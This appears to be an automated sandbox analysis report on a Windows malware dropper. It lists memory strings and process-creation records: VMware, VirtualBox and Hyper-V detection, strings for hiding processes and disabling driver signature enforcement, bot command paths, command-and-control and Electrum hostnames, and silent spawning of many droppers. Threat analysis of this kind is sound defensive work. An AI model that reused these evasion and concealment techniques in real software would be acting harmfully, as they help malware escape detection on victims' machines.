            Source: multitimer.exe, 00000004.00000003.901056768.000000001D675000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpBinary or memory string: is unavailable%d smbtest done()<>@,;:\"/[]?=0601021504Z0700476837158203125: cannot parse :ValidateLabels; SameSite=None<invalid Value>ASCII_Hex_DigitAccept-EncodingAccept-LanguageAddDllDirectoryBelowExactAboveCDN updated: %sCLSIDFromProgIDCLSIDFromStringCreateHardLinkWCreateWindowExWData[exploited]DefaultInstanceDelegateExecuteDeviceIoControlDuplicateHandleElectrumX 1.2.1Failed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGateway TimeoutGetActiveObjectGetAdaptersInfoGetCommandLineWGetProcessTimesGetSecurityInfoGetStartupInfoWHanifi_RohingyaIdempotency-KeyImpersonateSelfLength RequiredLoadLibraryExALoadLibraryExWNonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For]
            Source: svchost.exe, 00000000.00000002.653105667.0000026176880000.00000002.00000001.sdmp, SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.649314292.000000001B490000.00000002.00000001.sdmp, multitimer.exe, 00000002.00000002.670146862.000000001B920000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.709320382.0000029B32140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.735872158.00000233DE690000.00000002.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.834064929.000000001B090000.00000002.00000001.sdmp, tpwlxkeo40z.exe, 0000000F.00000002.768624246.000000001B650000.00000002.00000001.sdmp, installer.exe, 00000012.00000002.817568106.00000000009A0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: 2mqvpn30gyk.exeBinary or memory string: cKubsOJRr+jDp4sTOOFjNgfVR6FVb2zOYk0kRrNraSS32liHubWa/5y9wWHivumYVTvF7djSOeZ+Kot4wEj4In4kvMCIcdU+ZDN2TOJ2e752O9T/MaURPdBiM6F4Q16/MHG5trlSzceSN1EpgNyh/0wHul46QeVA+GnLu2tXCw3JSpm/EqSxVDdVHZBSl1qMv9btbwanaErsBth2TZZ1WW8GyfKWBctQarqcCXoazEEVBLm1EkrAwTf3UiDelQ37YUSC
            Source: multitimer.exe, 00000008.00000002.740370690.0000000003502000.00000004.00000001.sdmpBinary or memory string: #"HKEY_USERS\Software\VMware, Inc.\.
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpBinary or memory string: /app/app.exe100-continue152587890625762939453125Bidi_ControlCDN is emptyCIDR addressCONTINUATIONCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512FindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocWindows 1250Windows 1251Windows 1252Windows 1253Windows 1254Windows 1255Windows 1256Windows 1257Windows 1258Winmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad Pq valuebad Ta valuebad Tc valuebad Td valuebad Th valuebad Tq valuebad flushGenbad g statusbad g0 stackbad recoverybuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegc
            Source: tpwlxkeo40z.exe, 0000000F.00000002.754969058.00000000009EE000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}
            Source: svchost.exe, 00000000.00000002.653105667.0000026176880000.00000002.00000001.sdmp, SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.649314292.000000001B490000.00000002.00000001.sdmp, multitimer.exe, 00000002.00000002.670146862.000000001B920000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.709320382.0000029B32140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.735872158.00000233DE690000.00000002.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.834064929.000000001B090000.00000002.00000001.sdmp, tpwlxkeo40z.exe, 0000000F.00000002.768624246.000000001B650000.00000002.00000001.sdmp, installer.exe, 00000012.00000002.817568106.00000000009A0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: multitimer.exe, 0000000B.00000003.888125730.0000000000A6E000.00000004.00000001.sdmpBinary or memory string: y\Machine\Software\Classes\Software\VMware, Inc.
            Source: 2mqvpn30gyk.exe, 0000000E.00000002.742302893.0000000000979000.00000004.00000020.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: multitimer.exe, 00000008.00000002.721758678.00000000012FC000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648374462.0000000000D05000.00000004.00000020.sdmp, multitimer.exe, 00000002.00000002.668223534.0000000000B6C000.00000004.00000020.sdmp, multitimer.exe, 0000000B.00000003.850493442.0000000000A2A000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.742226663.0000000000967000.00000004.00000020.sdmp, tpwlxkeo40z.exe, 0000000F.00000002.754762916.000000000098A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: multitimer.exe, 00000008.00000002.806587601.000000001BE50000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlldM)
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpBinary or memory string: unknown network verify-signatureworkbuf is emptywww-authenticate initialHeapLive= spinningthreads=%%!%c(big.Int=%s)%d-%02d-%02d %02d/bots/update-data0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method ; SameSite=StrictAdjustTokenGroupsCOMPRESSION_ERRORCanSet() is falseCreateStdDispatchData[compaign_id]DnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIBM Code Page 037IBM Code Page 437IBM Code Page 850IBM Code Page 852IBM Code Page 855IBM Code Page 860IBM Code Page 862IBM Code Page 863IBM Code Page 865IBM Code Page 866If-Modified-SinceLookupAccountSidWMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5ReadProcessMemoryRegLoadMUIStringWSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcouldn't hide WUPcouldn't hide appcouldn't registercpu name is emptydecryption faileddiscover-electrumelectrumx.soon.itembedded/%s32.sysembedded/%s64.sysenode.duckdns.orgentersyscallblockerbium1.sytes.netexec format errorexec: not startedexponent overflowfile URL is emptyfilename is emptyfractional secondget-logfile-proxygp.waiting != nilgroom_allocationshandshake failureif-modified-sinceillegal parameterin string literalindex > windowEndinteger too largeinvalid bit size invalid stream IDkey align too biglibwww-perl/5.820locked m0 woke upmark - bad statusmarkBits overflowmissing closing )missing closing ]missing extensionnil resource bodyno data availablenotetsleepg on g0permission deniedrecords are emptyreflect.Value.Capreflect.Value.Intreflect.Value.Lenreflect: New(nil)reflect: call of runtime.newosprocruntime: a.base= runtime: b.base= runtime: nameOff runtime: next_gc=runtime: pointer runtime: textOff runtime: typeOff scanobject n == 0seeker can't seekselect (no cases)stack: frame={sp:thread exhaustiontransfer-encodingtruncated headersunexpected app IDunknown caller pcwait for GC cyclewine_get_version
            Source: multitimer.exe, 00000004.00000003.716800272.000000001BC23000.00000004.00000001.sdmpBinary or memory string: \Registry\Machine\Software\Classes\Software\VMware, Inc._
            Source: 2mqvpn30gyk.exeBinary or memory string: ysRJ+RHiTbwksm6HrXiFI87Nw79n4zlK0CjoRjHEqok/w3y7Zm8ETB2fpytw5NJDcvJOaCRNXKXKK6HkdsypqjXfJJuFijS9QRySEofQtzRwS6y36nRNNB0mCWryajLyU2UtyBTVBD/oyJk9INFjmVduuyHYXo+TGWddXQbnoKSi5+iCcf64K1eHo0gtS1CrhRR2Wpt1fL/SWSrMKwSCdbT4tOK86inzTJVD6JuivMciCObt+4XfvqqZCEkOzPlaJg1q
            Source: multitimer.exe, 00000008.00000002.740370690.0000000003502000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpBinary or memory string: NonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For]
            Source: multitimer.exe, 00000008.00000002.739832286.00000000034D7000.00000004.00000001.sdmpBinary or memory string: Software\VMware, Inc.
            Source: multitimer.exe, 00000008.00000002.740370690.0000000003502000.00000004.00000001.sdmpBinary or memory string: ,+HKEY_CURRENT_CONFIG\Software\VMware, Inc.\.
            Source: multitimer.exe, 00000004.00000003.780388244.000000001D675000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$$x
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpBinary or memory string: , s.base()=, s.npages=, settings:.WithCancel/api/report/app/vc.exe/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad GatewayBad RequestClassHESIODCloseHandleCloseWindowCoGetObjectCookie.PathCreateFileWDeleteFileWDisplayNameE-X.not.fyiENABLE_PUSHEND_HEADERSEarly HintsEnumWindowsExitProcessFreeLibraryGOTRACEBACKGetFileSizeGetFileTypeGetMessageWHTTPS_PROXYISO 8859-10ISO 8859-13ISO 8859-14ISO 8859-15ISO 8859-16ISO-8859-6EISO-8859-6IISO-8859-8EISO-8859-8IIdeographicIn-Reply-ToInstCaptureInstRuneAnyInstallDateMachineGuidMedefaidrinMessageBoxWMoveFileExWNetShareAddNetShareDelNew_Tai_LueOld_PersianOld_SogdianOpenProcessPRIVATE KEYPau_Cin_HauRegCloseKeyReturn-PathSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefenderWindows 874[:^xdigit:]\dsefix.exealarm clockapplicationattack_typebad addressbad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcompaign_idcreated by crypt32.dlldnsmessage.e2.keff.orgfile existsfinal tokenfloat32nan2float64nan2float64nan3gccheckmarkgeneralizedgetpeernamegetsocknamehost is nilhttps_proxyi/o timeoutlocal errorlost mcachemSpanManualmethodargs(mswsock.dllnext servernil contextnotify-hostorannis.comraw-controlreflect.Setretry-afterruntime: P runtime: p scheddetailsecur32.dllshell32.dllshort writetls: alert(tracealloc(traffic updunreachableupdate-dataupload-fileuserenv.dllversion=179vm detectedvmusrvc.exewininet.dllwup_process (sensitive) [recovered] allocCount found at *( gcscandone m->gsignal= minTrigger= nDataRoots= nSpanRoots= pages/byte
            Source: multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmpBinary or memory string: trackId=eyJpdiI6IldwSEQ2VFNOcHJ2QXNXRmI5NlE2Snc9PSIsInZhbHVlIjoiVlBQU0l3aVJnQUNzend3SnlMZEdVZmZlV210TGZJUCtDcHZReTBFK01VbTh6U05NRVdxZWhZTktkb3RIb1VVMCIsIm1hYyI6Ijg1MTY0YmZkNGVmZWNjN2IwNzQyOGI4MGM5MTJlMmVmZjAyOGNlMTczMjY4M2Y1ZTBiYWUwY2QyMGYxNTkwOGEifQ%3D%3D; path=/; HttpOnly
            Source: multitimer.exe, 00000003.00000002.681258695.00000000005ED000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|O3;`
            Source: multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmpBinary or memory string: Set-Cookie: trackId=eyJpdiI6IldwSEQ2VFNOcHJ2QXNXRmI5NlE2Snc9PSIsInZhbHVlIjoiVlBQU0l3aVJnQUNzend3SnlMZEdVZmZlV210TGZJUCtDcHZReTBFK01VbTh6U05NRVdxZWhZTktkb3RIb1VVMCIsIm1hYyI6Ijg1MTY0YmZkNGVmZWNjN2IwNzQyOGI4MGM5MTJlMmVmZjAyOGNlMTczMjY4M2Y1ZTBiYWUwY2QyMGYxNTkwOGEifQ%3D%3D; path=/; HttpOnly
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648327322.0000000000CAA000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}qM
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpBinary or memory string: unixpacketunknown pcupdate-cdnuser-agentuser32.dllvmsrvc.exewildflowerws2_32.dll of size (targetpc= ErrCode=%v a.npages= b.npages= bytes ...
            Source: svchost.exe, 00000000.00000002.653105667.0000026176880000.00000002.00000001.sdmp, SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.649314292.000000001B490000.00000002.00000001.sdmp, multitimer.exe, 00000002.00000002.670146862.000000001B920000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.709320382.0000029B32140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.735872158.00000233DE690000.00000002.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.834064929.000000001B090000.00000002.00000001.sdmp, tpwlxkeo40z.exe, 0000000F.00000002.768624246.000000001B650000.00000002.00000001.sdmp, installer.exe, 00000012.00000002.817568106.00000000009A0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: multitimer.exe, 00000004.00000003.716800272.000000001BC23000.00000004.00000001.sdmpBinary or memory string: \Registry\Machine\Software\Classes\Software\VMware, Inc.7
            Source: tpwlxkeo40z.exe, 0000000F.00000002.783880381.000000001BD70000.00000004.00000001.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: multitimer.exe, 00000008.00000002.740370690.0000000003502000.00000004.00000001.sdmpBinary or memory string: +*HKEY_LOCAL_MACHINE\Software\VMware, Inc.\.
            Source: 2mqvpn30gyk.exeBinary or memory string: TYnPeJiK23tliDi3VvLsKMj8SkyItUyOAW+9fIyC4UrJ+p6KWLQvr2nzBTj1Dy1Ji0CEoKS85jUcUk27ZZ/yLC4ahBPOU94trMZ0u1WFnab97LIFFFVhlyI203i8Yyzct4q2b6n+6/oKvML10HSAWx7p5lz+v3+tik+NyJJXWSkd47tr37jI0J/Mj46IjgHTh9AUipasGr0ZaWo2Rrqb7r425rTt9n/gha7SUTrXXEnd8sCL+trhgFSxIOnMDQ7E3xvQ
            Source: svchost.exe, 00000000.00000002.653105667.0000026176880000.00000002.00000001.sdmp, SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.649314292.000000001B490000.00000002.00000001.sdmp, multitimer.exe, 00000002.00000002.670146862.000000001B920000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.709320382.0000029B32140000.00000002.00000001.sdmp, svchost.exe, 0000000C.00000002.735872158.00000233DE690000.00000002.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.834064929.000000001B090000.00000002.00000001.sdmp, tpwlxkeo40z.exe, 0000000F.00000002.768624246.000000001B650000.00000002.00000001.sdmp, installer.exe, 00000012.00000002.817568106.00000000009A0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_00401B70 rdtsc 13_2_00401B70
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_01022012 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_01022012
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_010211D4 LoadLibraryA,GetProcAddress,CloseHandle,17_2_010211D4
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_01034D37 mov eax, dword ptr fs:[00000030h]17_2_01034D37
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_01034D7D mov eax, dword ptr fs:[00000030h]17_2_01034D7D
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_01030E41 mov eax, dword ptr fs:[00000030h]17_2_01030E41
            Source: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exeCode function: 13_2_00401000 GetCommandLineA,lstrlenA,ExitProcess,GetVersion,GetWindowsDirectoryA,lstrlenA,lstrcatA,lstrcatA,ShellExecuteExA,ExitProcess,GetForegroundWindow,GetTickCount,GetProcessHeap,13_2_00401000
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_01022012 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_01022012
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_01022398 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_01022398
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_010283CA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_010283CA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exeProcess created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 0 30601988b56f78c9.53290271 0 102Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 1 3.1613346908.6029b85c957f5Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe 'C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe' 2 3.1613346908.6029b85c957f5Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe 'C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe' /verysilent /cid=12 /subid=209Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe 'C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exe' Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe 'C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe' /S /pubid=1 /subid=451Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe 'C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe' 57a764d042bf8Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe 'C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe' testparamsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe 'C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe' Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe 'C:\Users\user\AppData\Local\Temp\zfocqbupv0l\app.exe' /8-23Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exe 'C:\Users\user\AppData\Local\Temp\amgjkax5nv1\AwesomePoolE1.exe' Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\3irwzwdz0tz\vpn.exe 'C:\Users\user\AppData\Local\Temp\3irwzwdz0tz\vpn.exe' /silent /subid=482Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\ych1rhrgxfs\installer.exe 'C:\Users\user\AppData\Local\Temp\ych1rhrgxfs\installer.exe' /verysilent /cid=12 /subid=209Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exe 'C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exe' 57a764d042bf8Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\ow1l0zgmgaf\safebits.exe 'C:\Users\user\AppData\Local\Temp\ow1l0zgmgaf\safebits.exe' /S /pubid=1 /subid=451Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\vwqpmvzrl2f\uhmrme5g5sj.exe 'C:\Users\user\AppData\Local\Temp\vwqpmvzrl2f\uhmrme5g5sj.exe' testparamsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exe 'C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exe' Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exe 'C:\Users\user\AppData\Local\Temp\cec353i0agk\app.exe' /8-23Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: C:\Users\user\AppData\Local\Temp\hfhc33nmvzc\vpn.exe 'C:\Users\user\AppData\Local\Temp\hfhc33nmvzc\vpn.exe' /silent /subid=482Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exeProcess created: unknown unknownJump to behavior
